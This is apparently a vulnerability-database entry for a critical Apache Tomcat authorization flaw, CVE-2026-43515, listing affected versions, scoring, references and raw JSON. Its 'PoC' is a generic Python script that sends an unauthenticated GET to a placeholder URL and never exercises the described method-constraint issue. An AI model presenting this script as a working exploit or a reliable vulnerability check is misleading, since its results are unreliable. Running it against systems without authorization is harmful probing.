Security Vulnerability Report
CVE-2026-43515 CVSS 9.1 CRITICAL

Published: 2026-05-12 16:16:19
Last Modified: 2026-05-14 20:17:06

Description

Improper Authorization vulnerability when multiple method constraints define an HTTP method for the same extension in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Apache Tomcat 11.0.0-M1 to 11.0.21
Apache Tomcat 10.1.0-M1 to 10.1.54
Apache Tomcat 9.0.0.M1 to 9.0.117
Apache Tomcat 8.5.0 to 8.5.100
Apache Tomcat 7.0.0 to 7.0.109

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-43515
# Description: This script checks if a protected resource can be accessed
# due to the improper authorization handling with multiple method constraints.

target_url = "http://target-vulnerable-tomcat.com/protected/resource.jsp"
headers = {
    "User-Agent": "CVE-2026-43515-Test"
}

print(f"[*] Attempting to access: {target_url}")

try:
    # Send a request without authentication cookies
    response = requests.get(target_url, headers=headers, timeout=10)

    if response.status_code == 200:
        print("[+] Potential Vulnerability Detected!")
        print("[+] Received 200 OK without authentication.")
        print(f"[+] Response Content Length: {len(response.text)}")
    elif response.status_code in (401, 403):
        print("[-] Access Denied. System might be patched or not vulnerable.")
    else:
        print(f"[?] Received status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error during request: {e}")

References

https://lists.apache.org/thread/746nxfxod0wsocxtmv8pb8nkgmwpc6bb
http://www.openwall.com/lists/oss-security/2026/05/12/11

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43515",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T16:16:18.553",
    "lastModified": "2026-05-14T20:17:05.887",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Authorization vulnerability when multiple method constraints define an HTTP method for the same extension in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-285"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/746nxfxod0wsocxtmv8pb8nkgmwpc6bb",
        "source": "[email protected]"
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/12/11",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}